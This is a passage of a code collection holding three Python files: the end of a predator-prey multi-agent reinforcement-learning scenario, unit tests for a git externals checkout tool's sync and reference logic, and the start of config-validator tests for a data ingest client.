return [agent for agent in world.agents if not agent.adversary and agent.active]
# return all adversarial agents
def adversaries(self, world):
return [agent for agent in world.agents if agent.adversary]
# return all active adversarial agents
def active_adversaries(self, world):
return [agent for agent in world.agents if agent.adversary and agent.active]
def reward(self, agent, world, action):
main_reward = self.adversary_reward(agent, world, action) if agent.adversary else self.agent_reward(agent, world, action)
return main_reward
def agent_reward(self, agent, world, action):
if agent.active:
# Agents are negatively rewarded if caught by adversaries
rew = 0.1
adversaries = self.active_adversaries(world)
if agent.collide:
for a in adversaries:
if self.is_collision(a, agent):
agent.captured = True
rew -= 50
break
return rew
else:
return 0.0
def adversary_reward(self, agent, world, action):
# Adversaries are rewarded for collisions with agents
rew = -0.1
# small penalty if agent chooses to move
if np.argmax(action[0]) != 0: rew -= world.action_penalty
agents = self.active_good_agents(world)
adversaries = self.active_adversaries(world)
if agent.collide:
capture_idxs, capture_advs = [], []
for i, ag in enumerate(agents):
for j, adv in enumerate(adversaries):
if self.is_collision(ag, adv):
capture_idxs.append(i)
capture_advs.append(adv)
ag.captured = True
if len(set(capture_idxs)) > 0:
if agent in capture_advs:
rew += (world.cap_reward * (1 - world.tax) + world.cap_reward * world.tax/2 * (len(capture_advs)-1))/len(capture_advs)
else:
rew += (world.cap_reward * world.tax/2 * len(capture_advs))/len(capture_advs)
return rew
def terminal(self, agent, world):
if agent.adversary:
# predator done if all prey caught
return all([agent.captured for agent in self.good_agents(world)])
else:
# prey done if caught
return agent.captured
def observation(self, agent, world):
# if agent.adversary:
# ag_pos = agent.state.p_pos
# print('agent {} pos = {}'.format(agent.id, agent.state.p_pos))
# pred/prey observations
other_pos = []
for other in world.agents:
if other is agent: continue
# if not other.adversary:
# prey_pos = other.state.p_pos
if world.partial:
# partial observations
if agent.adversary:
if not other.adversary:
other_pos.append(other.state.p_pos)
else:
other_pos.append(other.state.p_pos)
else:
# full observations
other_pos.append(other.state.p_pos)
if world.symmetric and agent.adversary:
other_pos = self.symmetrize(agent.id, other_pos)
# if agent.adversary:
# dist = math.sqrt((prey_pos[0] - ag_pos[0])**2 + (prey_pos[1] - ag_pos[1])**2)
# print('distance = {}'.format(dist))
# num_steps = dist / 0.12
# pen = 0.1*num_steps
# rew = 50 - pen
# print('value if capture = {}'.format(rew))
# print('value if NO capture = {}'.format(-pen))
obs = np.concatenate([agent.state.p_pos] + other_pos)
return obs
def symmetrize(self, agent_id, arr):
# ensure symmetry in obervation space
# P1 --> P2, P3
# P2 --> P3, P1
# P3 --> P1, P2
if agent_id == 0 or agent_id == 2:
return arr
else:
return [arr[1], arr[0], arr[2]]
| 38.571429
| 165
| 0.572428
|
4a0a334bb1b88b8c4baafdd5400a1d1f41635151
| 31,322
|
py
|
Python
|
manage_externals/test/test_unit_repository_git.py
|
guoqing-noaa/ufs-rtma-app
|
04106ae1899118f66c5b045092ebc0d736c0cbf6
|
[
"CC0-1.0"
] | 1
|
2021-08-30T03:11:41.000Z
|
2021-08-30T03:11:41.000Z
|
manage_externals/test/test_unit_repository_git.py
|
guoqing-noaa/ufs-rtma-app
|
04106ae1899118f66c5b045092ebc0d736c0cbf6
|
[
"CC0-1.0"
] | 2
|
2021-09-18T00:18:10.000Z
|
2021-10-18T15:10:07.000Z
|
manage_externals/test/test_unit_repository_git.py
|
guoqing-noaa/ufs-rtma-app
|
04106ae1899118f66c5b045092ebc0d736c0cbf6
|
[
"CC0-1.0"
] | 2
|
2020-06-15T17:44:13.000Z
|
2020-06-15T17:48:01.000Z
|
#!/usr/bin/env python
"""Unit test driver for checkout_externals
Note: this script assume the path to the checkout_externals.py module is
already in the python path.
"""
# pylint: disable=too-many-lines,protected-access
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import shutil
import unittest
from manic.repository_git import GitRepository
from manic.externals_status import ExternalStatus
from manic.externals_description import ExternalsDescription
from manic.externals_description import ExternalsDescriptionDict
from manic.global_constants import EMPTY_STR
# NOTE(bja, 2017-11) order is important here. origin should be a
# subset of other to trap errors on processing remotes!
GIT_REMOTE_OUTPUT_ORIGIN_UPSTREAM = '''
upstream /path/to/other/repo (fetch)
upstream /path/to/other/repo (push)
other /path/to/local/repo2 (fetch)
other /path/to/local/repo2 (push)
origin /path/to/local/repo (fetch)
origin /path/to/local/repo (push)
'''
class TestGitRepositoryCurrentRef(unittest.TestCase):
"""test the current_ref command on a git repository
"""
def setUp(self):
self._name = 'component'
rdata = {ExternalsDescription.PROTOCOL: 'git',
ExternalsDescription.REPO_URL:
'/path/to/local/repo',
ExternalsDescription.TAG:
'tag1',
}
data = {self._name:
{
ExternalsDescription.REQUIRED: False,
ExternalsDescription.PATH: 'junk',
ExternalsDescription.EXTERNALS: EMPTY_STR,
ExternalsDescription.REPO: rdata,
},
}
model = ExternalsDescriptionDict(data)
repo = model[self._name][ExternalsDescription.REPO]
self._repo = GitRepository('test', repo)
#
# mock methods replacing git system calls
#
@staticmethod
def _git_current_branch(branch_found, branch_name):
"""Return a function that takes the place of
repo._git_current_branch, which returns the given output."""
def my_git_current_branch():
"""mock function that can take the place of repo._git_current_branch"""
return branch_found, branch_name
return my_git_current_branch
@staticmethod
def _git_current_tag(tag_found, tag_name):
"""Return a function that takes the place of
repo._git_current_tag, which returns the given output."""
def my_git_current_tag():
"""mock function that can take the place of repo._git_current_tag"""
return tag_found, tag_name
return my_git_current_tag
@staticmethod
def _git_current_hash(hash_found, hash_name):
"""Return a function that takes the place of
repo._git_current_hash, which returns the given output."""
def my_git_current_hash():
"""mock function that can take the place of repo._git_current_hash"""
return hash_found, hash_name
return my_git_current_hash
# ------------------------------------------------------------------------
# Begin tests
# ------------------------------------------------------------------------
def test_ref_branch(self):
"""Test that we correctly identify we are on a branch
"""
self._repo._git_current_branch = self._git_current_branch(
True, 'feature3')
self._repo._git_current_tag = self._git_current_tag(True, 'foo_tag')
self._repo._git_current_hash = self._git_current_hash(True, 'abc123')
expected = 'feature3'
result = self._repo._current_ref()
self.assertEqual(result, expected)
def test_ref_detached_tag(self):
"""Test that we correctly identify that the ref is detached at a tag
"""
self._repo._git_current_branch = self._git_current_branch(False, '')
self._repo._git_current_tag = self._git_current_tag(True, 'foo_tag')
self._repo._git_current_hash = self._git_current_hash(True, 'abc123')
expected = 'foo_tag'
result = self._repo._current_ref()
self.assertEqual(result, expected)
def test_ref_detached_hash(self):
"""Test that we can identify ref is detached at a hash
"""
self._repo._git_current_branch = self._git_current_branch(False, '')
self._repo._git_current_tag = self._git_current_tag(False, '')
self._repo._git_current_hash = self._git_current_hash(True, 'abc123')
expected = 'abc123'
result = self._repo._current_ref()
self.assertEqual(result, expected)
def test_ref_none(self):
"""Test that we correctly identify that we're not in a git repo.
"""
self._repo._git_current_branch = self._git_current_branch(False, '')
self._repo._git_current_tag = self._git_current_tag(False, '')
self._repo._git_current_hash = self._git_current_hash(False, '')
result = self._repo._current_ref()
self.assertEqual(result, EMPTY_STR)
class TestGitRepositoryCheckSync(unittest.TestCase):
"""Test whether the GitRepository _check_sync_logic functionality is
correct.
Note: there are a lot of combinations of state:
- external description - tag, branch
- working copy
- doesn't exist (not checked out)
- exists, no git info - incorrect protocol, e.g. svn, or tarball?
- exists, git info
- as expected:
- different from expected:
- detached tag,
- detached hash,
- detached branch (compare remote and branch),
- tracking branch (compare remote and branch),
- same remote
- different remote
- untracked branch
Test list:
- doesn't exist
- exists no git info
- num_external * (working copy expected + num_working copy different)
- total tests = 16
"""
# NOTE(bja, 2017-11) pylint complains about long method names, but
# it is hard to differentiate tests without making them more
# cryptic. Also complains about too many public methods, but it
# doesn't really make sense to break this up.
# pylint: disable=invalid-name,too-many-public-methods
TMP_FAKE_DIR = 'fake'
TMP_FAKE_GIT_DIR = os.path.join(TMP_FAKE_DIR, '.git')
def setUp(self):
"""Setup reusable git repository object
"""
self._name = 'component'
rdata = {ExternalsDescription.PROTOCOL: 'git',
ExternalsDescription.REPO_URL:
'/path/to/local/repo',
ExternalsDescription.TAG: 'tag1',
}
data = {self._name:
{
ExternalsDescription.REQUIRED: False,
ExternalsDescription.PATH: self.TMP_FAKE_DIR,
ExternalsDescription.EXTERNALS: EMPTY_STR,
ExternalsDescription.REPO: rdata,
},
}
model = ExternalsDescriptionDict(data)
repo = model[self._name][ExternalsDescription.REPO]
self._repo = GitRepository('test', repo)
# The unit tests here don't care about the result of
# _current_ref, but we replace it here so that we don't need to
# worry about calling a possibly slow and possibly
# error-producing command (since _current_ref calls various git
# functions):
self._repo._current_ref = self._current_ref_empty
self._create_tmp_git_dir()
def tearDown(self):
"""Cleanup tmp stuff on the file system
"""
self._remove_tmp_git_dir()
def _create_tmp_git_dir(self):
"""Create a temporary fake git directory for testing purposes.
"""
if not os.path.exists(self.TMP_FAKE_GIT_DIR):
os.makedirs(self.TMP_FAKE_GIT_DIR)
def _remove_tmp_git_dir(self):
"""Remove the temporary fake git directory
"""
if os.path.exists(self.TMP_FAKE_DIR):
shutil.rmtree(self.TMP_FAKE_DIR)
#
# mock methods replacing git system calls
#
@staticmethod
def _current_ref_empty():
"""Return an empty string.
"""
return EMPTY_STR
@staticmethod
def _git_remote_origin_upstream():
"""Return an info string that is a checkout hash
"""
return GIT_REMOTE_OUTPUT_ORIGIN_UPSTREAM
@staticmethod
def _git_remote_none():
"""Return an info string that is a checkout hash
"""
return EMPTY_STR
@staticmethod
def _git_current_hash(myhash):
"""Return a function that takes the place of repo._git_current_hash,
which returns the given hash
"""
def my_git_current_hash():
"""mock function that can take the place of repo._git_current_hash"""
return 0, myhash
return my_git_current_hash
def _git_revparse_commit(self, expected_ref, mystatus, myhash):
"""Return a function that takes the place of
repo._git_revparse_commit, which returns a tuple:
(mystatus, myhash).
Expects the passed-in ref to equal expected_ref
status = 0 implies success, non-zero implies failure
"""
def my_git_revparse_commit(ref):
"""mock function that can take the place of repo._git_revparse_commit"""
self.assertEqual(expected_ref, ref)
return mystatus, myhash
return my_git_revparse_commit
# ----------------------------------------------------------------
#
# Tests where working copy doesn't exist or is invalid
#
# ----------------------------------------------------------------
def test_sync_dir_not_exist(self):
"""Test that a directory that doesn't exist returns an error status
Note: the Repository classes should be prevented from ever
working on an empty directory by the _Source object.
"""
stat = ExternalStatus()
self._repo._check_sync(stat, 'invalid_directory_name')
self.assertEqual(stat.sync_state, ExternalStatus.STATUS_ERROR)
# check_dir should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
def test_sync_dir_exist_no_git_info(self):
"""Test that a non-existent git repo returns an unknown status
"""
stat = ExternalStatus()
# Now we over-ride the _git_remote_verbose method on the repo to return
# a known value without requiring access to git.
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._tag = 'tag1'
self._repo._git_current_hash = self._git_current_hash('')
self._repo._git_revparse_commit = self._git_revparse_commit(
'tag1', 1, '')
self._repo._check_sync(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.UNKNOWN)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
# ------------------------------------------------------------------------
#
# Tests where version in configuration file is not a valid reference
#
# ------------------------------------------------------------------------
def test_sync_invalid_reference(self):
"""Test that an invalid reference returns out-of-sync
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._tag = 'tag1'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = self._git_revparse_commit(
'tag1', 1, '')
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
# ----------------------------------------------------------------
#
# Tests where external description specifies a tag
#
# ----------------------------------------------------------------
def test_sync_tag_on_same_hash(self):
"""Test expect tag on same hash --> status ok
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._tag = 'tag1'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = self._git_revparse_commit(
'tag1', 0, 'abc123')
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
def test_sync_tag_on_different_hash(self):
"""Test expect tag on a different hash --> status modified
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._tag = 'tag1'
self._repo._git_current_hash = self._git_current_hash('def456')
self._repo._git_revparse_commit = self._git_revparse_commit(
'tag1', 0, 'abc123')
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
# ----------------------------------------------------------------
#
# Tests where external description specifies a hash
#
# ----------------------------------------------------------------
def test_sync_hash_on_same_hash(self):
"""Test expect hash on same hash --> status ok
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._tag = ''
self._repo._hash = 'abc'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = self._git_revparse_commit(
'abc', 0, 'abc123')
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
def test_sync_hash_on_different_hash(self):
"""Test expect hash on a different hash --> status modified
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._tag = ''
self._repo._hash = 'abc'
self._repo._git_current_hash = self._git_current_hash('def456')
self._repo._git_revparse_commit = self._git_revparse_commit(
'abc', 0, 'abc123')
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
# ----------------------------------------------------------------
#
# Tests where external description specifies a branch
#
# ----------------------------------------------------------------
def test_sync_branch_on_same_hash(self):
"""Test expect branch on same hash --> status ok
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._branch = 'feature-2'
self._repo._tag = ''
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = (
self._git_revparse_commit('origin/feature-2', 0, 'abc123'))
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
def test_sync_branch_on_diff_hash(self):
"""Test expect branch on diff hash --> status modified
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._branch = 'feature-2'
self._repo._tag = ''
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = (
self._git_revparse_commit('origin/feature-2', 0, 'def456'))
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
def test_sync_branch_diff_remote(self):
"""Test _determine_remote_name with a different remote
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._branch = 'feature-2'
self._repo._tag = ''
self._repo._url = '/path/to/other/repo'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = (
self._git_revparse_commit('upstream/feature-2', 0, 'def456'))
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
# The test passes if _git_revparse_commit is called with the
# expected argument
def test_sync_branch_diff_remote2(self):
"""Test _determine_remote_name with a different remote
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._branch = 'feature-2'
self._repo._tag = ''
self._repo._url = '/path/to/local/repo2'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = (
self._git_revparse_commit('other/feature-2', 0, 'def789'))
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
# The test passes if _git_revparse_commit is called with the
# expected argument
def test_sync_branch_on_unknown_remote(self):
"""Test expect branch, but remote is unknown --> status modified
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._branch = 'feature-2'
self._repo._tag = ''
self._repo._url = '/path/to/unknown/repo'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = (
self._git_revparse_commit('unknown_remote/feature-2', 1, ''))
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
def test_sync_branch_on_untracked_local(self):
"""Test expect branch, on untracked branch in local repo --> status ok
Setting the externals description to '.' indicates that the
user only wants to consider the current local repo state
without fetching from remotes. This is required to preserve
the current branch of a repository during an update.
"""
stat = ExternalStatus()
self._repo._git_remote_verbose = self._git_remote_origin_upstream
self._repo._branch = 'feature3'
self._repo._tag = ''
self._repo._url = '.'
self._repo._git_current_hash = self._git_current_hash('abc123')
self._repo._git_revparse_commit = (
self._git_revparse_commit('feature3', 0, 'abc123'))
self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
# check_sync should only modify the sync_state, not clean_state
self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
class TestGitStatusPorcelain(unittest.TestCase):
"""Test parsing of output from git status --porcelain=v1 -z
"""
# pylint: disable=C0103
GIT_STATUS_PORCELAIN_V1_ALL = (
r' D INSTALL\0MM Makefile\0M README.md\0R cmakelists.txt\0'
r'CMakeLists.txt\0D commit-message-template.txt\0A stuff.txt\0'
r'?? junk.txt')
GIT_STATUS_PORCELAIN_CLEAN = r''
def test_porcelain_status_dirty(self):
"""Verify that git status output is considered dirty when there are
listed files.
"""
git_output = self.GIT_STATUS_PORCELAIN_V1_ALL
is_dirty = GitRepository._status_v1z_is_dirty(git_output)
self.assertTrue(is_dirty)
def test_porcelain_status_clean(self):
"""Verify that git status output is considered clean when there are no
listed files.
"""
git_output = self.GIT_STATUS_PORCELAIN_CLEAN
is_dirty = GitRepository._status_v1z_is_dirty(git_output)
self.assertFalse(is_dirty)
class TestGitCreateRemoteName(unittest.TestCase):
"""Test the create_remote_name method on the GitRepository class
"""
def setUp(self):
"""Common infrastructure for testing _create_remote_name
"""
self._rdata = {ExternalsDescription.PROTOCOL: 'git',
ExternalsDescription.REPO_URL:
'empty',
ExternalsDescription.TAG:
'very_useful_tag',
ExternalsDescription.BRANCH: EMPTY_STR,
ExternalsDescription.HASH: EMPTY_STR,
ExternalsDescription.SPARSE: EMPTY_STR, }
self._repo = GitRepository('test', self._rdata)
def test_remote_git_proto(self):
"""Test remote with git protocol
"""
self._repo._url = 'git@git.github.com:very_nice_org/useful_repo'
remote_name = self._repo._create_remote_name()
self.assertEqual(remote_name, 'very_nice_org_useful_repo')
def test_remote_https_proto(self):
"""Test remote with git protocol
"""
self._repo._url = 'https://www.github.com/very_nice_org/useful_repo'
remote_name = self._repo._create_remote_name()
self.assertEqual(remote_name, 'very_nice_org_useful_repo')
def test_remote_local_abs(self):
"""Test remote with git protocol
"""
self._repo._url = '/path/to/local/repositories/useful_repo'
remote_name = self._repo._create_remote_name()
self.assertEqual(remote_name, 'repositories_useful_repo')
def test_remote_local_rel(self):
"""Test remote with git protocol
"""
os.environ['TEST_VAR'] = '/my/path/to/repos'
self._repo._url = '${TEST_VAR}/../../useful_repo'
remote_name = self._repo._create_remote_name()
self.assertEqual(remote_name, 'path_useful_repo')
del os.environ['TEST_VAR']
class TestVerifyTag(unittest.TestCase):
"""Test logic verifying that a tag exists and is unique
"""
def setUp(self):
"""Setup reusable git repository object
"""
self._name = 'component'
rdata = {ExternalsDescription.PROTOCOL: 'git',
ExternalsDescription.REPO_URL:
'/path/to/local/repo',
ExternalsDescription.TAG: 'tag1',
}
data = {self._name:
{
ExternalsDescription.REQUIRED: False,
ExternalsDescription.PATH: 'tmp',
ExternalsDescription.EXTERNALS: EMPTY_STR,
ExternalsDescription.REPO: rdata,
},
}
model = ExternalsDescriptionDict(data)
repo = model[self._name][ExternalsDescription.REPO]
self._repo = GitRepository('test', repo)
@staticmethod
def _shell_true(url, remote=None):
_ = url
_ = remote
return 0
@staticmethod
def _shell_false(url, remote=None):
_ = url
_ = remote
return 1
@staticmethod
def _mock_function_true(ref):
_ = ref
return (TestValidRef._shell_true, '97ebc0e0deadc0de')
@staticmethod
def _mock_function_false(ref):
_ = ref
return (TestValidRef._shell_false, '97ebc0e0deadc0de')
def test_tag_not_tag_branch_commit(self):
"""Verify a non-tag returns false
"""
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_false
self._repo._tag = 'something'
remote_name = 'origin'
received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
self.assertFalse(received)
def test_tag_not_tag(self):
"""Verify a non-tag, untracked remote returns false
"""
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_true
self._repo._git_lsremote_branch = self._shell_true
self._repo._git_revparse_commit = self._mock_function_false
self._repo._tag = 'tag1'
remote_name = 'origin'
received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
self.assertFalse(received)
def test_tag_indeterminant(self):
"""Verify an indeterminant tag/branch returns false
"""
self._repo._git_showref_tag = self._shell_true
self._repo._git_showref_branch = self._shell_true
self._repo._git_lsremote_branch = self._shell_true
self._repo._git_revparse_commit = self._mock_function_true
self._repo._tag = 'something'
remote_name = 'origin'
received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
self.assertFalse(received)
def test_tag_is_unique(self):
"""Verify a unique tag match returns true
"""
self._repo._git_showref_tag = self._shell_true
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_true
self._repo._tag = 'tag1'
remote_name = 'origin'
received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
self.assertTrue(received)
def test_tag_is_not_hash(self):
"""Verify a commit hash is not classified as a tag
"""
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_true
self._repo._tag = '97ebc0e0'
remote_name = 'origin'
received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
self.assertFalse(received)
def test_hash_is_commit(self):
"""Verify a commit hash is not classified as a tag
"""
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_true
self._repo._tag = '97ebc0e0'
remote_name = 'origin'
received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
self.assertFalse(received)
class TestValidRef(unittest.TestCase):
"""Test logic verifying that a reference is a valid tag, branch or sha1
"""
def setUp(self):
"""Setup reusable git repository object
"""
self._name = 'component'
rdata = {ExternalsDescription.PROTOCOL: 'git',
ExternalsDescription.REPO_URL:
'/path/to/local/repo',
ExternalsDescription.TAG: 'tag1',
}
data = {self._name:
{
ExternalsDescription.REQUIRED: False,
ExternalsDescription.PATH: 'tmp',
ExternalsDescription.EXTERNALS: EMPTY_STR,
ExternalsDescription.REPO: rdata,
},
}
model = ExternalsDescriptionDict(data)
repo = model[self._name][ExternalsDescription.REPO]
self._repo = GitRepository('test', repo)
@staticmethod
def _shell_true(url, remote=None):
_ = url
_ = remote
return 0
@staticmethod
def _shell_false(url, remote=None):
_ = url
_ = remote
return 1
@staticmethod
def _mock_function_false(ref):
_ = ref
return (TestValidRef._shell_false, '')
@staticmethod
def _mock_function_true(ref):
_ = ref
return (TestValidRef._shell_true, '')
def test_valid_ref_is_invalid(self):
"""Verify an invalid reference raises an exception
"""
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_false
self._repo._tag = 'invalid_ref'
with self.assertRaises(RuntimeError):
self._repo._check_for_valid_ref(self._repo._tag)
def test_valid_tag(self):
"""Verify a valid tag return true
"""
self._repo._git_showref_tag = self._shell_true
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_true
self._repo._tag = 'tag1'
received = self._repo._check_for_valid_ref(self._repo._tag)
self.assertTrue(received)
def test_valid_branch(self):
"""Verify a valid tag return true
"""
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_true
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = self._mock_function_true
self._repo._tag = 'tag1'
received = self._repo._check_for_valid_ref(self._repo._tag)
self.assertTrue(received)
def test_valid_hash(self):
"""Verify a valid hash return true
"""
def _mock_revparse_commit(ref):
_ = ref
return (0, '56cc0b539426eb26810af9e')
self._repo._git_showref_tag = self._shell_false
self._repo._git_showref_branch = self._shell_false
self._repo._git_lsremote_branch = self._shell_false
self._repo._git_revparse_commit = _mock_revparse_commit
self._repo._hash = '56cc0b5394'
received = self._repo._check_for_valid_ref(self._repo._hash)
self.assertTrue(received)
if __name__ == '__main__':
unittest.main()
| 38.716934
| 84
| 0.640189
|
4a0a33fe78d2157d100cfcfe208d9b876c949042
| 6,841
|
py
|
Python
|
ingestclient/test/test_boss_validator_v02.py
|
lrodri29/ingest-client
|
548e1891990a70c23f2534eefbdbda35014edab1
|
[
"Apache-2.0"
] | null | null | null |
ingestclient/test/test_boss_validator_v02.py
|
lrodri29/ingest-client
|
548e1891990a70c23f2534eefbdbda35014edab1
|
[
"Apache-2.0"
] | null | null | null |
ingestclient/test/test_boss_validator_v02.py
|
lrodri29/ingest-client
|
548e1891990a70c23f2534eefbdbda35014edab1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from ingestclient.core.validator import Validator, BossValidatorV02
from ingestclient.core.backend import Backend, BossBackend
from ingestclient.core.config import Configuration, ConfigFileError
import os
import unittest
import json
from pkg_resources import resource_filename
import sys
class TestValidateConfig(unittest.TestCase):
# This was created mainly to support python 2.7 as well
def __init__(self, *args, **kwargs):
#First, Init the base class
super(TestValidateConfig, self).__init__(*args, **kwargs)
#Then account for python 2.7 difference in the function call
if sys.version_info < (3, 3):
#Back in python 2, the func was called "assertRegexpMatches".
# So to make current (py3) life easy, let's just equate the py2 version to our current impl
self.assertRegex = self.assertRegexpMatches
def get_skeleton_config(self):
"""
Returns a partial config that can be adjusted for different tests.
Returns:
(dict)
"""
return {
"schema": {
"name": "boss-v0.2-schema",
"validator": "BossValidatorV02"
},
"client": {
"backend": {
"name": "boss",
"class": "BossBackend",
"host": "api.theboss.io",
"protocol": "https"
},
"path_processor": {
"class":
"ingestclient.plugins.cloudvolume.CloudVolumePathProcessor",
"params": {}
}
#"tile_processor": {}
#"chunk_processor": {}
},
"database": {
"collection": "my_col_1",
"experiment": "my_exp_1",
"channel": "my_ch_1"
},
"ingest_job": {
# "ingest_type": "tile|volumetric",
"resolution": 0,
"extent": {
"x": [0, 8192],
"y": [0, 8192],
"z": [0, 500],
"t": [0, 1]
}
}
}
def test_valid_config(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_file = os.path.join(
resource_filename("ingestclient", "test/data"),
"boss-v0.2-test.json")
with open(config_file, 'rt') as example_file:
config_data = json.load(example_file)
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(0, len(msgs['error']))
def test_no_chunk_processor(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'volumetric'
config_data['ingest_job']['chunk_size'] = {
'x': 1024,
'y': 1024,
'z': 64
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*chunk_processor.*')
def test_no_chunk_size(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'volumetric'
config_data['client']['chunk_processor'] = {
"class":
"ingestclient.plugins.cloudvolume.CloudVolumeChunkProcessor",
"params": {
"cloudpath": "gs://neuroglancer/foo/bar"
}
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
